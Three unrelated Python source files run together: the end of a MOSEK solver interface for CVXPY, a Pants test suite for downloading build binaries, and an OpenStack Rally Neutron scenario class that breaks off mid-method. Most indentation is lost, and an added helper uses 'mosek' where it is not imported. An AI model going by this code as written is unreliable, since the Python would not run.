j_sdp_matrix)],
[min(i_sdp_matrix,
j_sdp_matrix)],
[coeff])],
[1.0])
current_con_index += 1
# solve
task.putobjsense(mosek.objsense.minimize)
task.optimize()
if verbose:
task.solutionsummary(mosek.streamtype.msg)
return format_results(task, data)
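# A minimal illustration (not part of the original interface, and an assumption about
# intent) of how the problem sizes computed in mosek_intf follow from the cone
# dimensions dict. The plain-string keys below stand in for the settings constants
# (s.LEQ_DIM, s.SOC_DIM, s.SDP_DIM) that the real code uses to index `dims`.
def _example_problem_sizes():
    dims = {"leq": 3, "soc": [3, 4], "sdp": [2]}  # 3 inequalities, two SOC cones, one 2x2 SDP block
    num_c, num_b = 5, 2                           # len(c) scalar variables and len(b) equalities
    numvar = num_c + sum(dims["soc"])             # extra variables appended for the SOC cone members
    numcon = num_b + dims["leq"] + sum(dims["soc"]) + sum(el ** 2 for el in dims["sdp"])
    assert (numvar, numcon) == (12, 16)
    return numvar, numcon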
def choose_solution(task):
"""Chooses between the basic and interior point solution.
Parameters
----------
task : mosek.Task
The solver status interface.
Returns
-------
soltype
The preferred solution (mosek.soltype.*)
solsta
The status of the preferred solution (mosek.solsta.*)
"""
import mosek
def rank(status):
# Rank solutions
# optimal > near_optimal > anything else > None
if status == mosek.solsta.optimal:
return 3
elif status == mosek.solsta.near_optimal:
return 2
elif status is not None:
return 1
else:
return 0
solsta_bas, solsta_itr = None, None
if task.solutiondef(mosek.soltype.bas):
solsta_bas = task.getsolsta(mosek.soltype.bas)
if task.solutiondef(mosek.soltype.itr):
solsta_itr = task.getsolsta(mosek.soltype.itr)
# As long as interior solution is not worse, take it
# (for backward compatibility)
if rank(solsta_itr) >= rank(solsta_bas):
return mosek.soltype.itr, solsta_itr
else:
return mosek.soltype.bas, solsta_bas
def format_results(task, data):
"""Converts the solver output into standard form.
Parameters
----------
task : mosek.Task
The solver status interface.
data : dict
Information about the problem.
Returns
-------
dict
The solver output in standard form.
"""
import mosek
# Map of MOSEK status to CVXPY status.
# taken from:
# http://docs.mosek.com/7.0/pythonapi/Solution_status_keys.html
STATUS_MAP = {mosek.solsta.optimal: s.OPTIMAL,
mosek.solsta.prim_infeas_cer: s.INFEASIBLE,
mosek.solsta.dual_infeas_cer: s.UNBOUNDED,
mosek.solsta.near_optimal: s.OPTIMAL_INACCURATE,
mosek.solsta.near_prim_infeas_cer: s.INFEASIBLE_INACCURATE,
mosek.solsta.near_dual_infeas_cer: s.UNBOUNDED_INACCURATE,
mosek.solsta.unknown: s.SOLVER_ERROR}
soltype, solsta = choose_solution(task)
if solsta in STATUS_MAP:
result_dict = {s.STATUS: STATUS_MAP[solsta]}
else:
result_dict = {s.STATUS: s.SOLVER_ERROR}
# Callback data example:
# http://docs.mosek.com/7.1/pythonapi/The_progress_call-back.html
# Retrieving double information items:
# http://docs.mosek.com/7.1/pythonapi/Task_getdouinf_.html#@generated-ID:5ef16e0
# http://docs.mosek.com/7.1/pythonapi/Double_information_items.html
result_dict[s.SOLVE_TIME] = task.getdouinf(mosek.dinfitem.optimizer_time)
result_dict[s.SETUP_TIME] = task.getdouinf(mosek.dinfitem.presolve_time)
result_dict[s.NUM_ITERS] = task.getintinf(mosek.iinfitem.intpnt_iter)
if result_dict[s.STATUS] in s.SOLUTION_PRESENT:
# get primal variables values
result_dict[s.PRIMAL] = np.zeros(task.getnumvar(), dtype=np.float)
task.getxx(soltype, result_dict[s.PRIMAL])
# get obj value
result_dict[s.VALUE] = task.getprimalobj(soltype) + \
data[s.OFFSET]
# get dual
y = np.zeros(task.getnumcon(), dtype=np.float)
task.gety(soltype, y)
# it appears signs are inverted
result_dict[s.EQ_DUAL] = -y[:len(data[s.B])]
result_dict[s.INEQ_DUAL] = \
-y[len(data[s.B]):len(data[s.B])+data[s.DIMS][s.LEQ_DIM]]
return result_dict
def _handle_mosek_params(task, params):
if params is None:
return
import mosek
def _handle_str_param(param, value):
if param.startswith("MSK_DPAR_"):
task.putnadouparam(param, value)
elif param.startswith("MSK_IPAR_"):
task.putnaintparam(param, value)
elif param.startswith("MSK_SPAR_"):
task.putnastrparam(param, value)
else:
raise ValueError("Invalid MOSEK parameter '%s'." % param)
def _handle_enum_param(param, value):
if isinstance(param, mosek.dparam):
task.putdouparam(param, value)
elif isinstance(param, mosek.iparam):
task.putintparam(param, value)
elif isinstance(param, mosek.sparam):
task.putstrparam(param, value)
else:
raise ValueError("Invalid MOSEK parameter '%s'." % param)
for param, value in params.items():
if isinstance(param, str):
_handle_str_param(param.strip(), value)
else:
_handle_enum_param(param, value)
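# A hypothetical example (an assumption, not taken from the original module) of the
# kind of mapping _handle_mosek_params accepts: string-named parameters must carry the
# MSK_DPAR_/MSK_IPAR_/MSK_SPAR_ prefix, while other keys are treated as mosek enum
# parameters. Defined as an uncalled helper so importing stays side-effect free.
def _example_mosek_params(task):
    params = {
        "MSK_DPAR_INTPNT_CO_TOL_REL_GAP": 1.0e-9,  # string name -> putnadouparam
        mosek.iparam.num_threads: 4,               # enum param  -> putintparam
    }
    _handle_mosek_params(task, params)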
|
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import glob
import logging
import os
import unittest.mock
from pants.binaries.binary_util import (
BinaryRequest,
BinaryToolFetcher,
BinaryToolUrlGenerator,
BinaryUtil,
select,
)
from pants.net.http.fetcher import Fetcher
from pants.testutil.test_base import TestBase
from pants.util.collections import assert_single_element
from pants.util.contextutil import environment_as, temporary_dir
from pants.util.dirutil import is_readable_dir, safe_file_dump, safe_open
logger = logging.getLogger(__name__)
class ExternalUrlGenerator(BinaryToolUrlGenerator):
def generate_urls(self, version, host_platform):
return ["https://www.pantsbuild.org/some-binary", "https://www.pantsbuild.org/same-binary"]
# Make the __str__ (which falls back to __repr__) deterministic, for testing exception messages.
def __repr__(self):
return "ExternalUrlGenerator(<example __str__()>)"
# TODO: test requests with an archiver!
class BinaryUtilTest(TestBase):
"""Tests binary_util's binaries_baseurls handling."""
class MapFetcher:
"""Class which pretends to be a pants.net.http.Fetcher, but is actually a dictionary."""
def __init__(self, read_map):
self._map = read_map
def download(self, url, path_or_fd=None, **kwargs):
if url not in self._map:
raise IOError(f"404: Virtual URL '{url}' does not exist.")
if not path_or_fd:
raise AssertionError("Expected path_or_fd to be set")
path_or_fd.write(self._map[url])
return path_or_fd
def keys(self):
return list(self._map.keys())
def values(self):
return list(self._map.values())
def __getitem__(self, key):
return self._map[key] # Vanilla internal map access (without lambda shenanigans).
@classmethod
def _fake_base(cls, name):
return f"fake-url-{name}"
@classmethod
def _fake_url(cls, binaries, base, binary_key):
binary_util = cls._gen_binary_util()
supportdir, version, name = binaries[binary_key]
binary_request = binary_util._make_deprecated_binary_request(supportdir, version, name)
binary_path = binary_request.get_download_path(binary_util.host_platform())
return f"{base}/{binary_path}"
@classmethod
def _gen_binary_tool_fetcher(
cls, bootstrap_dir="/tmp", timeout_secs=30, fetcher=None, ignore_cached_download=True
):
return BinaryToolFetcher(
bootstrap_dir=bootstrap_dir,
timeout_secs=timeout_secs,
fetcher=fetcher,
ignore_cached_download=ignore_cached_download,
)
@classmethod
def _gen_binary_util(
cls,
baseurls=[],
path_by_id=None,
allow_external_binary_tool_downloads=True,
uname_func=None,
**kwargs,
):
return BinaryUtil(
baseurls=baseurls,
binary_tool_fetcher=cls._gen_binary_tool_fetcher(**kwargs),
path_by_id=path_by_id,
allow_external_binary_tool_downloads=allow_external_binary_tool_downloads,
uname_func=uname_func,
)
@classmethod
def _read_file(cls, file_path):
with open(file_path, "rb") as result_file:
return result_file.read()
def test_timeout(self):
fetcher = unittest.mock.create_autospec(Fetcher, spec_set=True)
timeout_value = 42
binary_util = self._gen_binary_util(
baseurls=["http://binaries.example.com"], timeout_secs=timeout_value, fetcher=fetcher
)
self.assertFalse(fetcher.download.called)
fetch_path = binary_util.select_script(
supportdir="a-binary", version="v1.2", name="a-binary"
)
logger.debug(f"fetch_path: {fetch_path}")
fetcher.download.assert_called_once_with(
"http://binaries.example.com/a-binary/v1.2/a-binary",
listener=unittest.mock.ANY,
path_or_fd=unittest.mock.ANY,
timeout_secs=timeout_value,
)
def test_no_base_urls_error(self):
"""Tests exception handling if build support urls are improperly specified."""
binary_util = self._gen_binary_util()
with self.assertRaises(BinaryUtil.BinaryResolutionError) as cm:
binary_util.select_script("supportdir", "version", "name")
the_raised_exception_message = str(cm.exception)
self.assertIn(BinaryUtil.NoBaseUrlsError.__name__, the_raised_exception_message)
expected_msg = (
"Error resolving binary request BinaryRequest(supportdir='supportdir', version='version', "
"name='name', platform_dependent=False, external_url_generator=None, archiver=None): "
"--binaries-baseurls is empty."
)
self.assertIn(expected_msg, the_raised_exception_message)
def test_support_url_multi(self):
"""Tests to make sure existing base urls function as expected."""
bootstrap_dir = "/tmp"
with temporary_dir() as invalid_local_files, temporary_dir() as valid_local_files:
binary_util = self._gen_binary_util(
baseurls=[
"BLATANTLY INVALID URL",
"https://dl.bintray.com/pantsbuild/bin/reasonably-invalid-url",
invalid_local_files,
valid_local_files,
"https://dl.bintray.com/pantsbuild/bin/another-invalid-url",
],
bootstrap_dir=bootstrap_dir,
)
binary_request = binary_util._make_deprecated_binary_request(
supportdir="bin/protobuf", version="2.4.1", name="protoc"
)
binary_path = binary_request.get_download_path(binary_util.host_platform())
contents = b"proof"
with safe_open(os.path.join(valid_local_files, binary_path), "wb") as fp:
fp.write(contents)
binary_path_abs = os.path.join(bootstrap_dir, binary_path)
self.assertEqual(
os.path.realpath(binary_path_abs),
os.path.realpath(binary_util.select(binary_request)),
)
self.assertEqual(contents, self._read_file(binary_path_abs))
def test_support_url_fallback(self):
"""Tests fallback behavior with multiple support baseurls.
Mocks up some dummy baseurls and then swaps out the URL reader to make sure the
expected urls are accessed and others are not.
"""
fake_base, fake_url = self._fake_base, self._fake_url
bases = [fake_base("apple"), fake_base("orange"), fake_base("banana")]
binaries = {
t[2]: t
for t in (
("bin/protobuf", "2.4.1", "protoc"),
("bin/ivy", "4.3.7", "ivy"),
("bin/bash", "4.4.3", "bash"),
)
}
fetcher = self.MapFetcher(
{
fake_url(binaries, bases[0], "protoc"): b"SEEN PROTOC",
fake_url(binaries, bases[0], "ivy"): b"SEEN IVY",
fake_url(binaries, bases[1], "bash"): b"SEEN BASH",
fake_url(binaries, bases[1], "protoc"): b"UNSEEN PROTOC 1",
fake_url(binaries, bases[2], "protoc"): b"UNSEEN PROTOC 2",
fake_url(binaries, bases[2], "ivy"): b"UNSEEN IVY 2",
}
)
binary_util = self._gen_binary_util(baseurls=bases, fetcher=fetcher)
unseen = [item for item in fetcher.values() if item.startswith(b"SEEN ")]
for supportdir, version, name in binaries.values():
binary_path_abs = binary_util.select_binary(
supportdir=supportdir, version=version, name=name
)
expected_content = f"SEEN {name.upper()}".encode()
self.assertEqual(expected_content, self._read_file(binary_path_abs))
unseen.remove(expected_content)
self.assertEqual(0, len(unseen)) # Make sure we've seen all the SEENs.
def test_select_binary_base_path_linux(self):
def uname_func():
return "linux", "dontcare1", "dontcare2", "dontcare3", "amd64"
binary_util = self._gen_binary_util(uname_func=uname_func)
binary_request = binary_util._make_deprecated_binary_request(
"supportdir", "version", "name"
)
self.assertEqual(
"supportdir/linux/x86_64/version/name", binary_util._get_download_path(binary_request)
)
def test_select_binary_base_path_darwin(self):
def uname_func():
return (
"darwin",
"dontcare1",
"14.9",
"dontcare2",
"dontcare3",
)
binary_util = self._gen_binary_util(uname_func=uname_func)
binary_request = binary_util._make_deprecated_binary_request(
"supportdir", "version", "name"
)
self.assertEqual(
"supportdir/mac/10.10/version/name", binary_util._get_download_path(binary_request)
)
def test_select_binary_base_path_missing_os(self):
def uname_func():
return "vms", "dontcare1", "999.9", "dontcare2", "VAX9"
binary_util = self._gen_binary_util(uname_func=uname_func)
with self.assertRaises(BinaryUtil.BinaryResolutionError) as cm:
binary_util.select_binary("supportdir", "version", "name")
the_raised_exception_message = str(cm.exception)
self.assertIn(BinaryUtil.MissingMachineInfo.__name__, the_raised_exception_message)
expected_msg = (
"Error resolving binary request BinaryRequest(supportdir='supportdir', version='version', "
"name='name', platform_dependent=True, external_url_generator=None, archiver=None): "
"Pants could not resolve binaries for the current host: platform 'vms' was not recognized. "
"Recognized platforms are: [darwin, linux]."
)
self.assertIn(expected_msg, the_raised_exception_message)
def test_select_binary_base_path_missing_arch(self):
def uname_func():
return "linux", "dontcare1", "don'tcare2", "dontcare3", "quantum_computer"
binary_util = self._gen_binary_util(uname_func=uname_func)
with self.assertRaises(BinaryUtil.BinaryResolutionError) as cm:
binary_util.select_binary("mysupportdir", "myversion", "myname")
the_raised_exception_message = str(cm.exception)
self.assertIn(BinaryUtil.MissingMachineInfo.__name__, the_raised_exception_message)
expected_msg = (
"Error resolving binary request BinaryRequest(supportdir='mysupportdir', version='myversion', "
"name='myname', platform_dependent=True, external_url_generator=None, archiver=None): "
"Pants could not resolve binaries for the current host. Update --binaries-path-by-id to "
"find binaries for the current host platform ('linux', "
"'quantum_computer').\\n--binaries-path-by-id was:"
)
self.assertIn(expected_msg, the_raised_exception_message)
def test_select_script_missing_arch(self):
def uname_func():
return "linux", "dontcare1", "dontcare2", "dontcare3", "quantum_computer"
binary_util = self._gen_binary_util(uname_func=uname_func)
with self.assertRaises(BinaryUtil.BinaryResolutionError) as cm:
binary_util.select_script("mysupportdir", "myversion", "myname")
the_raised_exception_message = str(cm.exception)
self.assertIn(BinaryUtil.MissingMachineInfo.__name__, the_raised_exception_message)
expected_msg = (
"Error resolving binary request BinaryRequest(supportdir='mysupportdir', version='myversion', "
# platform_dependent=False when doing select_script()
"name='myname', platform_dependent=False, external_url_generator=None, archiver=None): Pants "
"could not resolve binaries for the current host. Update --binaries-path-by-id to find "
"binaries for the current host platform ('linux', "
"'quantum_computer').\\n--binaries-path-by-id was:"
)
self.assertIn(expected_msg, the_raised_exception_message)
def test_select_binary_base_path_override(self):
def uname_func():
return "darwin", "dontcare1", "100.99", "dontcare2", "t1000"
binary_util = self._gen_binary_util(
uname_func=uname_func, path_by_id={("darwin", "100"): ["skynet", "42"]}
)
binary_request = binary_util._make_deprecated_binary_request(
"supportdir", "version", "name"
)
self.assertEqual(
"supportdir/skynet/42/version/name", binary_util._get_download_path(binary_request)
)
def test_external_url_generator(self):
binary_util = self._gen_binary_util(baseurls=[])
binary_request = BinaryRequest(
supportdir="supportdir",
version="version",
name="name",
platform_dependent=False,
external_url_generator=ExternalUrlGenerator(),
# TODO: test archiver!
archiver=None,
)
with self.assertRaises(BinaryUtil.BinaryResolutionError) as cm:
binary_util.select(binary_request)
the_raised_exception_message = str(cm.exception)
self.assertIn(BinaryToolFetcher.BinaryNotFound.__name__, the_raised_exception_message)
expected_msg = (
"Error resolving binary request BinaryRequest(supportdir='supportdir', version='version', "
"name='name', platform_dependent=False, "
"external_url_generator=ExternalUrlGenerator(<example __str__()>), archiver=None): "
"Failed to fetch name binary from any source: (Failed to fetch binary from "
"https://www.pantsbuild.org/some-binary: Fetch of https://www.pantsbuild.org/some-binary failed with "
"status code 404, Failed to fetch binary from https://www.pantsbuild.org/same-binary: Fetch of "
"https://www.pantsbuild.org/same-binary failed with status code 404)"
)
self.assertIn(expected_msg, the_raised_exception_message)
def test_disallowing_external_urls(self):
binary_util = self._gen_binary_util(baseurls=[], allow_external_binary_tool_downloads=False)
binary_request = BinaryRequest(
supportdir="supportdir",
version="version",
name="name",
platform_dependent=False,
external_url_generator=ExternalUrlGenerator(),
# TODO: test archiver!
archiver=None,
)
with self.assertRaises(BinaryUtil.BinaryResolutionError) as cm:
binary_util.select(binary_request)
the_raised_exception_message = str(cm.exception)
self.assertIn(BinaryUtil.NoBaseUrlsError.__name__, the_raised_exception_message)
expected_msg = (
"Error resolving binary request BinaryRequest(supportdir='supportdir', version='version', "
"name='name', platform_dependent=False, "
"external_url_generator=ExternalUrlGenerator(<example __str__()>), archiver=None): "
"--binaries-baseurls is empty."
)
self.assertIn(expected_msg, the_raised_exception_message)
def test_select_argv(self):
"""Test invoking binary_util.py as a standalone script."""
with temporary_dir() as tmp_dir:
config_file_loc = os.path.join(tmp_dir, "pants.toml")
safe_file_dump(
config_file_loc,
payload=f"""\
[GLOBAL]
allow_external_binary_tool_downloads = true
pants_bootstrapdir = "{tmp_dir}"
""",
)
expected_output_glob = os.path.join(tmp_dir, "bin", "cmake", "*", "*", "3.9.5", "cmake")
with environment_as(PANTS_CONFIG_FILES=f"[{config_file_loc!r}]"):
# Ignore the first argument, as per sys.argv.
output_file = select(["_", "cmake", "3.9.5", "cmake.tar.gz"])
self.assertTrue(is_readable_dir(output_file))
realized_glob = assert_single_element(glob.glob(expected_output_glob))
self.assertEqual(os.path.realpath(output_file), os.path.realpath(realized_glob))
|
|
# Copyright 2014: Intel Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
from rally.common.i18n import _
from rally.common import logging
from rally import exceptions
from rally.plugins.openstack import scenario
from rally.plugins.openstack.wrappers import network as network_wrapper
from rally.task import atomic
LOG = logging.getLogger(__name__)
class NeutronScenario(scenario.OpenStackScenario):
"""Base class for Neutron scenarios with basic atomic actions."""
SUBNET_IP_VERSION = 4
# TODO(rkiran): modify in case LBaaS-v2 requires
LB_METHOD = "ROUND_ROBIN"
LB_PROTOCOL = "HTTP"
LB_PROTOCOL_PORT = 80
HM_TYPE = "PING"
HM_MAX_RETRIES = 3
HM_DELAY = 20
HM_TIMEOUT = 10
def _get_network_id(self, network, **kwargs):
"""Get Neutron network ID for the network name.
:param network: str, network name or id
:param kwargs: dict, network options
:returns: str, Neutron network-id
"""
networks = self._list_networks(atomic_action=False)
for net in networks:
if (net["name"] == network) or (net["id"] == network):
return net["id"]
msg = (_("Network %s not found.") % network)
raise exceptions.NotFoundException(message=msg)
@atomic.action_timer("neutron.create_network")
def _create_network(self, network_create_args):
"""Create neutron network.
:param network_create_args: dict, POST /v2.0/networks request options
:returns: neutron network dict
"""
network_create_args["name"] = self.generate_random_name()
return self.clients("neutron").create_network(
{"network": network_create_args})
@atomic.optional_action_timer("neutron.list_networks")
def _list_networks(self, **kwargs):
"""Return user networks list.
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:param kwargs: network list options
"""
return self.clients("neutron").list_networks(**kwargs)["networks"]
@atomic.action_timer("neutron.update_network")
def _update_network(self, network, network_update_args):
"""Update the network.
This atomic function updates the network with network_update_args.
:param network: Network object
:param network_update_args: dict, POST /v2.0/networks update options
:returns: updated neutron network dict
"""
network_update_args["name"] = self.generate_random_name()
body = {"network": network_update_args}
return self.clients("neutron").update_network(
network["network"]["id"], body)
@atomic.action_timer("neutron.delete_network")
def _delete_network(self, network):
"""Delete neutron network.
:param network: Network object
"""
self.clients("neutron").delete_network(network["id"])
@atomic.action_timer("neutron.create_subnet")
def _create_subnet(self, network, subnet_create_args, start_cidr=None):
"""Create neutron subnet.
:param network: neutron network dict
:param subnet_create_args: POST /v2.0/subnets request options
:returns: neutron subnet dict
"""
network_id = network["network"]["id"]
if not subnet_create_args.get("cidr"):
start_cidr = start_cidr or "10.2.0.0/24"
subnet_create_args["cidr"] = (
network_wrapper.generate_cidr(start_cidr=start_cidr))
subnet_create_args["network_id"] = network_id
subnet_create_args["name"] = self.generate_random_name()
subnet_create_args.setdefault("ip_version", self.SUBNET_IP_VERSION)
return self.clients("neutron").create_subnet(
{"subnet": subnet_create_args})
@atomic.action_timer("neutron.list_subnets")
def _list_subnets(self):
"""Returns user subnetworks list."""
return self.clients("neutron").list_subnets()["subnets"]
@atomic.action_timer("neutron.update_subnet")
def _update_subnet(self, subnet, subnet_update_args):
"""Update the neutron subnet.
This atomic function updates the subnet with subnet_update_args.
:param subnet: Subnet object
:param subnet_update_args: dict, PUT /v2.0/subnets update options
:returns: updated neutron subnet dict
"""
subnet_update_args["name"] = self.generate_random_name()
body = {"subnet": subnet_update_args}
return self.clients("neutron").update_subnet(
subnet["subnet"]["id"], body)
@atomic.action_timer("neutron.delete_subnet")
def _delete_subnet(self, subnet):
"""Delete neutron subnet
:param subnet: Subnet object
"""
self.clients("neutron").delete_subnet(subnet["subnet"]["id"])
@atomic.action_timer("neutron.create_router")
def _create_router(self, router_create_args, external_gw=False):
"""Create neutron router.
:param router_create_args: POST /v2.0/routers request options
:returns: neutron router dict
"""
router_create_args["name"] = self.generate_random_name()
if external_gw:
for network in self._list_networks():
if network.get("router:external"):
external_network = network
gw_info = {"network_id": external_network["id"],
"enable_snat": True}
router_create_args.setdefault("external_gateway_info",
gw_info)
return self.clients("neutron").create_router(
{"router": router_create_args})
@atomic.action_timer("neutron.list_routers")
def _list_routers(self):
"""Returns user routers list."""
return self.clients("neutron").list_routers()["routers"]
@atomic.action_timer("neutron.delete_router")
def _delete_router(self, router):
"""Delete neutron router
:param router: Router object
"""
self.clients("neutron").delete_router(router["router"]["id"])
@atomic.action_timer("neutron.update_router")
def _update_router(self, router, router_update_args):
"""Update the neutron router.
This atomic function updates the router with router_update_args.
:param router: dict, neutron router
:param router_update_args: dict, PUT /v2.0/routers update options
:returns: updated neutron router dict
"""
router_update_args["name"] = self.generate_random_name()
body = {"router": router_update_args}
return self.clients("neutron").update_router(
router["router"]["id"], body)
@atomic.action_timer("neutron.create_port")
def _create_port(self, network, port_create_args):
"""Create neutron port.
:param network: neutron network dict
:param port_create_args: POST /v2.0/ports request options
:returns: neutron port dict
"""
port_create_args["network_id"] = network["network"]["id"]
port_create_args["name"] = self.generate_random_name()
return self.clients("neutron").create_port({"port": port_create_args})
@atomic.action_timer("neutron.list_ports")
def _list_ports(self):
"""Return user ports list."""
return self.clients("neutron").list_ports()["ports"]
@atomic.action_timer("neutron.update_port")
def _update_port(self, port, port_update_args):
"""Update the neutron port.
This atomic function updates port with port_update_args.
:param port: dict, neutron port
:param port_update_args: dict, PUT /v2.0/ports update options
:returns: updated neutron port dict
"""
port_update_args["name"] = self.generate_random_name()
body = {"port": port_update_args}
return self.clients("neutron").update_port(port["port"]["id"], body)
@atomic.action_timer("neutron.delete_port")
def _delete_port(self, port):
"""Delete neutron port.
:param port: Port object
"""
self.clients("neutron").delete_port(port["port"]["id"])
@logging.log_deprecated_args(_("network_create_args is deprecated; "
"use the network context instead"),
"0.1.0", "network_create_args")
def _get_or_create_network(self, network_create_args=None):
"""Get a network from context, or create a new one.
This lets users either create networks with the 'network'
context, provide existing networks with the 'existing_network'
context, or let the scenario create a default network for
them. Running this without one of the network contexts is
deprecated.
:param network_create_args: Deprecated way to provide network
creation args; use the network
context instead.
:returns: Network dict
"""
if "networks" in self.context["tenant"]:
return {"network":
random.choice(self.context["tenant"]["networks"])}
else:
LOG.warning(_("Running this scenario without either the 'network' "
"or 'existing_network' context is deprecated"))
return self._create_network(network_create_args or {})
def _create_subnets(self, network,
subnet_create_args=None,
subnet_cidr_start=None,
subnets_per_network=1):
"""Create <count> new subnets in the given network.
:param network: network to create subnets in
:param subnet_create_args: dict, POST /v2.0/subnets request options
:param subnet_cidr_start: str, start value for subnets CIDR
:param subnets_per_network: int, number of subnets for one network
:returns: List of subnet dicts
"""
return [self._create_subnet(network, subnet_create_args or {},
subnet_cidr_start)
for i in range(subnets_per_network)]
def _create_network_and_subnets(self,
network_create_args=None,
subnet_create_args=None,
subnets_per_network=1,
subnet_cidr_start="1.0.0.0/24"):
"""Create network and subnets.
:param network_create_args: dict, POST /v2.0/networks request options
:param subnet_create_args: dict, POST /v2.0/subnets request options
:param subnets_per_network: int, number of subnets for one network
:param subnet_cidr_start: str, start value for subnets CIDR
:returns: tuple of result network and subnets list
"""
network = self._create_network(network_create_args or {})
subnets = self._create_subnets(network, subnet_create_args,
subnet_cidr_start, subnets_per_network)
return network, subnets
def _create_network_structure(self, network_create_args=None,
subnet_create_args=None,
subnet_cidr_start=None,
subnets_per_network=None,
router_create_args=None):
"""Create a network and a given number of subnets and routers.
:param network_create_args: dict, POST /v2.0/networks request options
:param subnet_create_args: dict, POST /v2.0/subnets request options
:param subnet_cidr_start: str, start value for subnets CIDR
:param subnets_per_network: int, number of subnets for one network
:param router_create_args: dict, POST /v2.0/routers request options
:returns: tuple of (network, subnets, routers)
"""
network = self._get_or_create_network(network_create_args)
subnets = self._create_subnets(network, subnet_create_args,
subnet_cidr_start,
subnets_per_network)
routers = []
for subnet in subnets:
router = self._create_router(router_create_args or {})
self._add_interface_router(subnet["subnet"],
router["router"])
routers.append(router)
return (network, subnets, routers)
@atomic.action_timer("neutron.add_interface_router")
def _add_interface_router(self, subnet, router):
"""Connect subnet to router.
:param subnet: dict, neutron subnet
:param router: dict, neutron router
"""
self.clients("neutron").add_interface_router(
router["id"], {"subnet_id": subnet["id"]})
@atomic.action_timer("neutron.remove_interface_router")
def _remove_interface_router(self, subnet, router):
"""Remove subnet from router
:param subnet: dict, neutron subnet
:param router: dict, neutron router
"""
self.clients("neutron").remove_interface_router(
router["id"], {"subnet_id": subnet["id"]})
@atomic.optional_action_timer("neutron.create_loadbalancer")
def _create_loadbalancer(self, subnet_id, **lb_create_args):
"""Create LB loadbalancer(v2)
:param subnet_id: str, neutron subnet-id
:param lb_create_args: dict, POST /lbaas/loadbalancers request options
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:returns: dict, neutron loadbalancer
"""
args = {"name": self.generate_random_name(),
"vip_subnet_id": subnet_id}
args.update(lb_create_args)
return self.clients("neutron").create_loadbalancer({"loadbalancer": args})
def _create_v2_loadbalancer(self, networks, **lb_create_args):
"""Create LB loadbalancer(v2)
:param networks: list, neutron networks
:param lb_create_args: dict, POST /lbaas/loadbalancers request options
:returns: list, neutron loadbalancers
"""
subnets = []
lb = []
for net in networks:
subnets.extend(net.get("subnets", []))
with atomic.ActionTimer(self, "neutron.create_%s_lbs" %
len(subnets)):
for subnet_id in subnets:
lb.append(self._create_loadbalancer(
subnet_id, atomic_action=False, **lb_create_args))
return lb
@atomic.action_timer("neutron.delete_loadbalancer")
def _delete_v2_loadbalancer(self, lb):
"""Delete neutron vip.
:param vip: neutron Virtual IP object
"""
self.clients("neutron").delete_loadbalancer(lb)
@atomic.action_timer("neutron.create_listener")
def _create_v2_listener(self, lb, **listener_create_args):
"""Create Listener(lbaasv2)
:param lb: dict, neutron loadbalancer
:param listener_create_args: dict, POST /lbaas/listeners request options
:returns: dict, neutron listener
"""
args = {"protocol": self.LB_PROTOCOL,
"protocol_port": self.LB_PROTOCOL_PORT,
"name": self.generate_random_name(),
"loadbalancer_id": lb["loadbalancer"]["id"]}
args.update(listener_create_args)
return self.clients("neutron").create_listener({"listener": args})
@atomic.action_timer("neutron.delete_listener")
def _delete_v2_listener(self, listener):
"""Delete neutron vip.
:param vip: neutron Virtual IP object
"""
self.clients("neutron").delete_listener(listener)
@atomic.optional_action_timer("neutron.create_lbaas_pool")
def _create_v2_pool(self, listener, **pool_create_args):
"""Create LB pool(v2)
:param listener: dict, neutron listener the pool is attached to
:param pool_create_args: dict, POST /lbaas/pools request options
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:returns: dict, neutron lb pool
"""
args = {"lb_algorithm": self.LB_METHOD,
"protocol": self.LB_PROTOCOL,
"name": self.generate_random_name(),
"listener_id": listener["listener"]["id"]}
args.update(pool_create_args)
return self.clients("neutron").create_lbaas_pool({"pool": args})
@atomic.action_timer("neutron.delete_listener")
def _delete_v2_pool(self, pool):
"""Delete loadbalancer pool.
:param vip: neutron Virtual IP object
"""
self.clients("neutron").delete_lbaas_pool(pool)
@atomic.optional_action_timer("neutron.create_lbaas_member")
def _create_v2_pool_member(self, subnet_id, pool, **mem_create_args):
"""Create LB pool member (v2)
:param subnet_id: str, neutron subnet-id
:param pool: dict, neutron lbaas pool to add the member to
:param mem_create_args: dict, POST /lbaas/pools/{pool_id}/members request options
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:returns: dict, neutron lbaas member
"""
args = {"subnet_id": subnet_id,
"protocol_port": self.LB_PROTOCOL_PORT}
args.update(mem_create_args)
return self.clients("neutron").create_lbaas_member(pool["pool"]["id"], {"member": args})
@atomic.action_timer("neutron.delete_pool_member")
def _delete_v2_pool_member(self, member, pool):
"""Delete lbaas pool member.
:param member: lbaas pool member to delete
:param pool: lbaas pool the member belongs to
"""
self.clients("neutron").delete_lbaas_member(member, pool)
@atomic.optional_action_timer("neutron.create_pool")
def _create_lb_pool(self, subnet_id, **pool_create_args):
"""Create LB pool(v1)
:param subnet_id: str, neutron subnet-id
:param pool_create_args: dict, POST /lb/pools request options
:param atomic_action: True if this is an atomic action. added
and handled by the
optional_action_timer() decorator
:returns: dict, neutron lb pool
"""
args = {"lb_method": self.LB_METHOD,
"protocol": self.LB_PROTOCOL,
"name": self.generate_random_name(),
"subnet_id": subnet_id}
args.update(pool_create_args)
return self.clients("neutron").create_pool({"pool": args})
def _create_v1_pools(self, networks, **pool_create_args):
"""Create LB pools(v1)
:param networks: list, neutron networks
:param pool_create_args: dict, POST /lb/pools request options
:returns: list, neutron lb pools
"""
subnets = []
pools = []
for net in networks:
subnets.extend(net.get("subnets", []))
with atomic.ActionTimer(self, "neutron.create_%s_pools" %
len(subnets)):
for subnet_id in subnets:
pools.append(self._create_lb_pool(
subnet_id, atomic_action=False, **pool_create_args))
return pools
@atomic.action_timer("neutron.list_pools")
def _list_v1_pools(self, **kwargs):
"""Return user lb pool list(v1)."""
